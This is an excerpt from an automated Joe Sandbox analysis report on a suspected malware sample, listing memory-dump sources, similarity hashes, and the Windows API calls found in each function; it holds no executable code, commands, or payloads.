                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                        • String ID:
                                                                        • API String ID: 3869813825-0
                                                                        • Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                        • Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
                                                                        • Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
                                                                        • Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54
                                                                        APIs
                                                                        • _wcslen.LIBCMT ref: 00464B28
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
                                                                        • _wcslen.LIBCMT ref: 00464C28
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
                                                                        • _wcslen.LIBCMT ref: 00464CBA
                                                                        • _wcslen.LIBCMT ref: 00464CD0
                                                                        • _wcslen.LIBCMT ref: 00464CEF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$Directory$CurrentSystem
                                                                        • String ID: D
                                                                        • API String ID: 1914653954-2746444292
                                                                        • Opcode ID: 5f72559f0a2586b771b9af551f03c1fb97e064fdb306134380bfcbf6c4a29eaa
                                                                        • Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
                                                                        • Opcode Fuzzy Hash: 5f72559f0a2586b771b9af551f03c1fb97e064fdb306134380bfcbf6c4a29eaa
                                                                        • Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A
                                                                        APIs
                                                                        • _wcsncpy.LIBCMT ref: 0045CE39
                                                                        • __wsplitpath.LIBCMT ref: 0045CE78
                                                                        • _wcscat.LIBCMT ref: 0045CE8B
                                                                        • _wcscat.LIBCMT ref: 0045CE9E
                                                                        • GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5
                                                                          • Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F
                                                                        • GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
                                                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
                                                                        • _wcscpy.LIBCMT ref: 0045CF61
                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
                                                                        • String ID: *.*
                                                                        • API String ID: 1153243558-438819550
                                                                        • Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                        • Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
                                                                        • Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
                                                                        • Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll
                                                                        • String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
                                                                        • API String ID: 3832890014-4202584635
                                                                        • Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                        • Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
                                                                        • Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
                                                                        • Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED
                                                                        APIs
                                                                        • PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
                                                                        • GetFocus.USER32 ref: 0046A0DD
                                                                        • GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
                                                                        • PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessagePost$CtrlFocus
                                                                        • String ID: 0
                                                                        • API String ID: 1534620443-4108050209
                                                                        • Opcode ID: 69f57c1da7d99aaf19a54cb3f0377e1430f34c496c45dabe130679879bb200d9
                                                                        • Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
                                                                        • Opcode Fuzzy Hash: 69f57c1da7d99aaf19a54cb3f0377e1430f34c496c45dabe130679879bb200d9
                                                                        • Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB
                                                                        APIs
                                                                        • DestroyWindow.USER32(?), ref: 004558E3
                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateDestroy
                                                                        • String ID: ,$tooltips_class32
                                                                        • API String ID: 1109047481-3856767331
                                                                        • Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                        • Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
                                                                        • Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
                                                                        • Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98
                                                                        APIs
                                                                        • GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
                                                                        • GetMenuItemCount.USER32(?), ref: 00468C45
                                                                        • DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
                                                                        • DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
                                                                        • DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
                                                                        • DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
                                                                        • GetMenuItemCount.USER32 ref: 00468CFD
                                                                        • SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
                                                                        • GetCursorPos.USER32(?), ref: 00468D3F
                                                                        • SetForegroundWindow.USER32(?), ref: 00468D49
                                                                        • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
                                                                        • PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
                                                                        • String ID: 0
                                                                        • API String ID: 1441871840-4108050209
                                                                        • Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                        • Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
                                                                        • Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
                                                                        • Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A
                                                                        APIs
                                                                        • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                          • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                          • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                        • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                        • __swprintf.LIBCMT ref: 00460915
                                                                        • __swprintf.LIBCMT ref: 0046092D
                                                                        • _wprintf.LIBCMT ref: 004609E1
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                        • API String ID: 3631882475-2268648507
                                                                        • Opcode ID: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                        • Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
                                                                        • Opcode Fuzzy Hash: 34748020dcaf007b6c88f6c4c4dd7bf7ecfb2d58ebabdf7d9dae9be74c8fa7b1
                                                                        • Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9
                                                                        APIs
                                                                        • ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
                                                                        • ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
                                                                        • SendMessageW.USER32 ref: 00471740
                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
                                                                        • SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
                                                                        • SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
                                                                        • ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
                                                                        • ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
                                                                        • SendMessageW.USER32 ref: 0047184F
                                                                        • SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
                                                                        • SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
                                                                        • DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
                                                                        • String ID:
                                                                        • API String ID: 4116747274-0
                                                                        • Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                        • Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
                                                                        • Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
                                                                        • Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54
                                                                        APIs
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461678
                                                                        • _wcslen.LIBCMT ref: 00461683
                                                                        • __swprintf.LIBCMT ref: 00461721
                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 00461811
                                                                        • GetDlgCtrlID.USER32(?), ref: 00461869
                                                                        • GetWindowRect.USER32(?,?), ref: 004618A4
                                                                        • GetParent.USER32(?), ref: 004618C3
                                                                        • ScreenToClient.USER32(00000000), ref: 004618CA
                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00461941
                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0046197E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
                                                                        • String ID: %s%u
                                                                        • API String ID: 1899580136-679674701
                                                                        • Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                        • Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
                                                                        • Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
                                                                        • Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6
                                                                        APIs
                                                                        • GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
                                                                        • SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
                                                                        • Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: InfoItemMenu$Sleep
                                                                        • String ID: 0
                                                                        • API String ID: 1196289194-4108050209
                                                                        • Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                        • Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
                                                                        • Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
                                                                        • Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69
                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 0043143E
                                                                        • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00431459
                                                                        • SelectObject.GDI32(00000000,?), ref: 00431466
                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
                                                                        • GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129678340.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129705857.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
                                                                        • String ID: (
                                                                        • API String ID: 3300687185-3887548279
                                                                        • Opcode ID: 603e6b3e37746ec9058b96d14af227772b21f97dc715e72dc47e988551ca64b1
                                                                        • Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
                                                                        • Opcode Fuzzy Hash: 603e6b3e37746ec9058b96d14af227772b21f97dc715e72dc47e988551ca64b1
                                                                        • Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4
                                                                        APIs
                                                                          • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                          • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                        • GetDriveTypeW.KERNEL32 ref: 0045DB32
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED
                                                                          • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                          • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2129595525.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.2129582910.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129637715.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129652929.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2129666227.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
